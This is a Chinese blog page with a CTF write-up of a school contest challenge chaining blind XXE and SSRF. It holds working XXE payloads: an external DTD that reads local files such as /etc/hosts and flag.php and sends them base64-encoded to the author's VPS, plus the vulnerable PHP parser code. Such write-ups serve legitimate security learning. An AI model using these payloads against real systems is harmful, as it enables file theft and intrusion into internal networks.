<!DOCTYPE html>
<html lang="zh-CN">
  <head>
    
<meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>


<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />

<meta name="theme-color" content="#f8f5ec" />
<meta name="msapplication-navbutton-color" content="#f8f5ec">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="#f8f5ec">



  <meta name="description" content="一道XXE漏洞和SSRF结合的题目"/>




  <meta name="keywords" content="ctf, writeup, 八一" />



  <meta name="baidu-site-verification" content="HhUstaSjr0" />



  <meta name="google-site-verification" content="UA-102975942-1" />






  <link rel="alternate" href="/atom.xml" title="八一">




  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=2.6.0" />



<link rel="canonical" href="https://bay1.top/2018/01/14/一道XXE和SSRF的题目/"/>


<link rel="stylesheet" type="text/css" href="/css/style.css?v=2.6.0" />
<link rel="stylesheet" type="text/css" href="/css/prettify.css" media="screen" />
<link rel="stylesheet" type="text/css" href="/css/sons-of-obsidian.css" media="screen" />



  <link rel="stylesheet" type="text/css" href="/lib/fancybox/jquery.fancybox.css" />




  
  <script id="baidu_analytics">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?9a885cc9fb6cd7bcef579deb8efe8a70";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>



  <script id="google_analytics">
    (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
        (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
        m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
        })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

        ga('create', 'UA-102975942-1', 'auto');
        ga('send', 'pageview');
  </script>










    <title> 一道XXE漏洞和SSRF结合的题目 - 八一 </title>
  </head>

  <body><div id="mobile-navbar" class="mobile-navbar">
  <div class="mobile-header-logo">
    <a href="/." class="logo">八一</a>
  </div>
  <div class="mobile-navbar-icon">
    <span></span>
    <span></span>
    <span></span>
  </div>
</div>

<nav id="mobile-menu" class="mobile-menu slideout-menu">
  <ul class="mobile-menu-list">
    
      <a href="/archives">
        <li class="mobile-menu-item">
          
          
            文章
          
        </li>
      </a>
    
      <a href="/tags">
        <li class="mobile-menu-item">
          
          
            标签
          
        </li>
      </a>
    
      <a href="/about">
        <li class="mobile-menu-item">
          
          
            关于/友链
          
        </li>
      </a>
    
      <a href="/search">
        <li class="mobile-menu-item">
          
          
            站内搜索
          
        </li>
      </a>
    
  </ul>
</nav>

    <div class="container" id="mobile-panel">
      <header id="header" class="header"><div class="logo-wrapper">
  <a href="/." class="logo">八一</a>
</div>

<nav class="site-navbar">
  
    <ul id="menu" class="menu">
      
        <li class="menu-item">
          <a class="menu-item-link" href="/archives">
            
            
              文章
            
          </a>
        </li>
      
        <li class="menu-item">
          <a class="menu-item-link" href="/tags">
            
            
              标签
            
          </a>
        </li>
      
        <li class="menu-item">
          <a class="menu-item-link" href="/about">
            
            
              关于/友链
            
          </a>
        </li>
      
        <li class="menu-item">
          <a class="menu-item-link" href="/search">
            
            
              站内搜索
            
          </a>
        </li>
      
    </ul>
  
</nav>

      </header>

      <main id="main" class="main">
        <div class="content-wrapper">
          <div id="content" class="content">
            
  
  <article class="post">
    <header class="post-header">
      <h1 class="post-title">
        
          一道XXE漏洞和SSRF结合的题目
        
      </h1>

      <div class="post-meta">
        <span class="post-time">
          2018-01-14
        </span>
        
        
        
      </div>
    </header>

    
    

    <div class="post-content">
      
        <blockquote>
<p>学校在考试周,ennnn…..搞了校赛<br>遇到了一道xxe和ssrf结合的题目,感觉挺不错的,简单记录一下</p>
</blockquote>
<a id="more"></a>
<p>这里只记录下流程,具体的原理这里有几个链接(当时也是复习了一遍<br>前辈们比我写得好</p>
<p><a href="https://security.tencent.com/index.php/blog/msg/69" target="_blank" rel="noopener">未知攻焉知防——XXE漏洞攻防</a><br><a href="https://b1ngz.github.io/XXE-learning-note/" target="_blank" rel="noopener">XXE漏洞的简单理解和测试</a></p>
<blockquote>
<p>打开题目很清楚就是xxe且无回显,接下来就直接写题解了<br>首先vps放文件file.dtd,内容如下：</p>
</blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;!ENTITY % payl SYSTEM &quot;php://filter/read=convert.base64-encode/resource=file:///etc/hosts&quot;&gt;</span><br><span class="line">&lt;!ENTITY % int &quot;&lt;!ENTITY &amp;#37; trick SYSTEM &apos;http://我的VPS地址/?p=%payl;&apos;&gt;&quot;&gt;</span><br></pre></td></tr></table></figure>
<blockquote>
<p>漏洞处payload</p>
</blockquote>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE convert [ &lt;!ENTITY % remote SYSTEM "http://我的VPS地址/file.dtd"&gt;%remote;%int;%trick;]&gt;</span></span><br></pre></td></tr></table></figure>
<blockquote>
<p>查看服务器log(nginx一般在var/log/nginx/access.log)</p>
</blockquote>
<p><img src="https://s1.ax1x.com/2018/01/14/ptDX9I.png" alt="xxessrf"></p>
<blockquote>
<p>base64解码</p>
</blockquote>
<figure class="highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">127<span class="selector-class">.0</span><span class="selector-class">.0</span><span class="selector-class">.1</span>	<span class="selector-tag">localhost</span></span><br><span class="line"><span class="selector-pseudo">::1</span>	<span class="selector-tag">localhost</span> <span class="selector-tag">ip6-localhost</span> <span class="selector-tag">ip6-loopback</span></span><br><span class="line"><span class="selector-tag">fe00</span><span class="selector-pseudo">::0</span>	<span class="selector-tag">ip6-localnet</span></span><br><span class="line"><span class="selector-tag">ff00</span><span class="selector-pseudo">::0</span>	<span class="selector-tag">ip6-mcastprefix</span></span><br><span class="line"><span class="selector-tag">ff02</span><span class="selector-pseudo">::1</span>	<span class="selector-tag">ip6-allnodes</span></span><br><span class="line"><span class="selector-tag">ff02</span><span class="selector-pseudo">::2</span>	<span class="selector-tag">ip6-allrouters</span></span><br><span class="line">172<span class="selector-class">.17</span><span class="selector-class">.0</span><span class="selector-class">.6</span>	<span class="selector-tag">flag</span> 5<span class="selector-tag">e8af79b12ae</span> <span class="selector-tag">xxessrf_flag_1</span></span><br><span class="line">172<span class="selector-class">.17</span><span class="selector-class">.0</span><span class="selector-class">.6</span>	<span class="selector-tag">flag_1</span> 5<span class="selector-tag">e8af79b12ae</span> <span class="selector-tag">xxessrf_flag_1</span></span><br><span class="line">172<span class="selector-class">.17</span><span class="selector-class">.0</span><span class="selector-class">.6</span>	<span class="selector-tag">xxessrf_flag_1</span> 5<span class="selector-tag">e8af79b12ae</span></span><br><span class="line">172<span class="selector-class">.17</span><span class="selector-class">.0</span><span class="selector-class">.7</span>	74791<span class="selector-tag">d7ac29b</span></span><br></pre></td></tr></table></figure>
<blockquote>
<p>嗯？？？？还有一层？？？接着继续读下index</p>
</blockquote>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE html&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span><span class="tag">&lt;<span class="name">head</span>&gt;</span><span class="tag">&lt;<span class="name">meta</span> <span class="attr">http-equiv</span>=<span class="string">"Content-Type"</span> <span class="attr">content</span>=<span class="string">"text/html; charset=UTF-8"</span>&gt;</span></span><br><span class="line">	 </span><br><span class="line">	<span class="tag">&lt;<span class="name">title</span>&gt;</span>XML<span class="tag">&lt;/<span class="name">title</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;<span class="name">link</span> <span class="attr">rel</span>=<span class="string">"stylesheet"</span> <span class="attr">href</span>=<span class="string">"./bootstrap.min.css"</span>&gt;</span>  </span><br><span class="line">	<span class="tag">&lt;<span class="name">script</span> <span class="attr">src</span>=<span class="string">"./jquery.min.js"</span>&gt;</span><span class="undefined"></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;<span class="name">script</span> <span class="attr">src</span>=<span class="string">"./bootstrap.min.js"</span>&gt;</span><span class="undefined"></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">form</span> <span class="attr">role</span>=<span class="string">"form"</span> <span class="attr">id</span>=<span class="string">"form"</span> <span class="attr">method</span>=<span class="string">"POST"</span> <span class="attr">action</span>=<span class="string">"index.php"</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;<span class="name">div</span> <span class="attr">class</span>=<span class="string">"form-group"</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">label</span> <span class="attr">for</span>=<span class="string">"name"</span>&gt;</span>XML<span class="tag">&lt;/<span class="name">label</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">textarea</span> <span class="attr">class</span>=<span class="string">"form-control"</span> <span class="attr">rows</span>=<span class="string">"6"</span> <span class="attr">name</span>=<span class="string">"data"</span> <span class="attr">placeholder</span>=<span class="string">"</span></span></span><br><span class="line"><span class="tag"><span class="string">&lt;code&gt;</span></span></span><br><span class="line"><span class="tag"><span class="string">	&lt;body&gt;Hello World!&lt;/body&gt;</span></span></span><br><span class="line"><span class="tag"><span class="string">&lt;/code&gt; </span></span></span><br><span class="line"><span class="tag"><span class="string">"</span>&gt;</span><span class="tag">&lt;/<span class="name">textarea</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;/<span class="name">div</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">div</span> <span class="attr">class</span>=<span class="string">"btn-group"</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">button</span> <span class="attr">type</span>=<span class="string">"button"</span> <span class="attr">class</span>=<span class="string">"btn btn-default"</span> <span class="attr">onclick</span>=<span class="string">"document.getElementById('form').submit()"</span>&gt;</span>SUBMIT<span class="tag">&lt;/<span class="name">button</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;/<span class="name">div</span>&gt;</span></span><br><span class="line">  <span class="php"><span class="meta">&lt;?php</span></span></span><br><span class="line"><span class="php">  	error_reporting(<span class="number">0</span>);</span></span><br><span class="line"><span class="php">	<span class="keyword">include</span>(<span class="string">"flag.php"</span>);</span></span><br><span class="line"><span class="php">	<span class="keyword">if</span>(<span class="keyword">isset</span>($_POST[<span class="string">'data'</span>]) <span class="keyword">and</span> $_POST[<span class="string">'data'</span>] != <span class="string">""</span>) &#123;</span></span><br><span class="line"><span class="php">		$xml = simplexml_load_string($_POST[<span class="string">'data'</span>], <span class="keyword">null</span>, LIBXML_NOENT);</span></span><br><span class="line"><span class="php">	&#125;</span></span><br><span class="line"><span class="php">	<span class="meta">?&gt;</span></span></span><br><span class="line">  <span class="tag">&lt;/<span class="name">form</span>&gt;</span></span><br></pre></td></tr></table></figure>
<blockquote>
<p>哦？？圈住include(“flag.php”),尝试直接读,没反应,想着也应该,还有提示SSRF<br>至此,上午工作基本结束,剩下持续发呆直到下午……<br>xxessrf???开始探测内网端口….从8080…..到2018…..<br>嗯中途放弃了…..最后又拿了起来,在队友群又发一下hosts截图</p>
</blockquote>
<p>你那个172.17.0.7是啥?</p>
<blockquote>
<p>…….docker,内网<br>读取flag</p>
</blockquote>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;!ENTITY % payl<span class="built_in"> SYSTEM </span><span class="string">"php://filter/read=convert.base64-encode/resource=http://172.17.0.6/?file=php://filter/read=convert.base64-encode/resource=flag.php"</span>&gt;</span><br><span class="line">&lt;!ENTITY % int <span class="string">"&lt;!ENTITY &amp;#37; trick SYSTEM 'http://我的VPS地址/?p=%payl;'&gt;"</span>&gt;</span><br></pre></td></tr></table></figure>
<figure class="highlight gcode"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">UEQ<span class="number">5</span>d<span class="number">2</span>FIQWdDaTh<span class="number">2</span>WldOb<span class="number">2</span>J<span class="number">5</span>QWlZ<span class="name">M1</span>Z<span class="number">0</span>ZEdOMFpudE<span class="symbol">NNV2</span>x<span class="number">1</span>TTE<span class="number">5</span><span class="symbol">NGVETmZZVzVrWDNOemNtWmZNWE5</span>mUTI<span class="number">5</span>dmJEOTlJa<span class="symbol">nNLUHo0</span>S<span class="number">0</span><span class="symbol">NnPT0</span>=</span><br><span class="line"></span><br><span class="line">...</span><br><span class="line"></span><br><span class="line">&lt;?php </span><br><span class="line"><span class="comment">//echo "cumtctf&#123;B1in3_xx3_and_ssrf_1s_Cool?&#125;";</span></span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<blockquote>
<p>好久没做题了,脑子有点不好使……</p>
</blockquote>

      
    </div>

    
      
      



      
      
    

    
      <footer class="post-footer">
        
          <div class="post-tags">
            
              <a href="/tags/ctf/">ctf</a>
            
              <a href="/tags/writeup/">writeup</a>
            
          </div>
        
        
        
  <nav class="post-nav">
    
      <a class="prev" href="/2018/01/31/Ajax与Flask传值的跨域问题/">
        <i class="iconfont icon-left"></i>
        <span class="prev-text nav-default">Ajax与Flask传值的跨域问题</span>
        <span class="prev-text nav-mobile">上一篇</span>
      </a>
    
    
      <a class="next" href="/2018/01/03/如何分多次Pull-requests/">
        <span class="next-text nav-default">如何分多次Pull requests</span>
        <span class="prev-text nav-mobile">下一篇</span>
        <i class="iconfont icon-right"></i>
      </a>
    
  </nav>

      </footer>
    

  </article>


          </div>
          
  <div class="comments" id="comments">
      <div id="disqus_thread">
        <noscript>
          Please enable JavaScript to view the
          <a href="//disqus.com/?ref_noscript">comments powered by Disqus.</a>
        </noscript>
      </div> 
    </div>
  </div>


        </div>
      </main>

      <footer id="footer" class="footer">

  <div class="social-links">
    
      
        
          <a href="https://github.com/bay1" class="iconfont icon-github" title="github"></a>
        
      
    
      
        
          <a href="http://weibo.com/3190704711/profile?topnav=1&wvr=6&is_all=1" class="iconfont icon-weibo" title="weibo"></a>
        
      
    
      
    
      
    
      
    
    
    
  </div>


<div class="copyright">
  <span class="copyright-year">
    
    &copy; 
     
      2016 - 
    
    2018
    <span class="author">bay1</span>
  </span>
</div>
      </footer>

      <div class="back-to-top" id="back-to-top">
        <i class="iconfont icon-up"></i>
      </div>
    </div>

    
  
  <script type="text/javascript">
    var disqus_config = function () {
        this.page.url = 'https://bay1.top/2018/01/14/一道XXE和SSRF的题目/';
        this.page.identifier = '2018/01/14/一道XXE和SSRF的题目/';
        this.page.title = '一道XXE漏洞和SSRF结合的题目';
    };
    (function() {
    var d = document, s = d.createElement('script');

    s.src = '//https-blog-flywinky-top-1.disqus.com/embed.js';

    s.setAttribute('data-timestamp', +new Date());
    (d.head || d.body).appendChild(s);
    })();  
  </script>



    
  





  
    <script type="text/javascript" src="/lib/jquery/jquery-3.1.1.min.js"></script>
  

  
    <script type="text/javascript" src="/lib/slideout/slideout.js"></script>
  

  
    <script type="text/javascript" src="/lib/fancybox/jquery.fancybox.pack.js"></script>
  


    <script type="text/javascript" src="/js/src/even.js?v=2.6.0"></script>
<script type="text/javascript" src="/js/src/bootstrap.js?v=2.6.0"></script>
<script src="/js/prettify.js"></script>
<script type="text/javascript">
$(document).ready(function(){
 $('pre').addClass('prettyprint');
   prettyPrint();
 })
</script>
  </body>
</html>
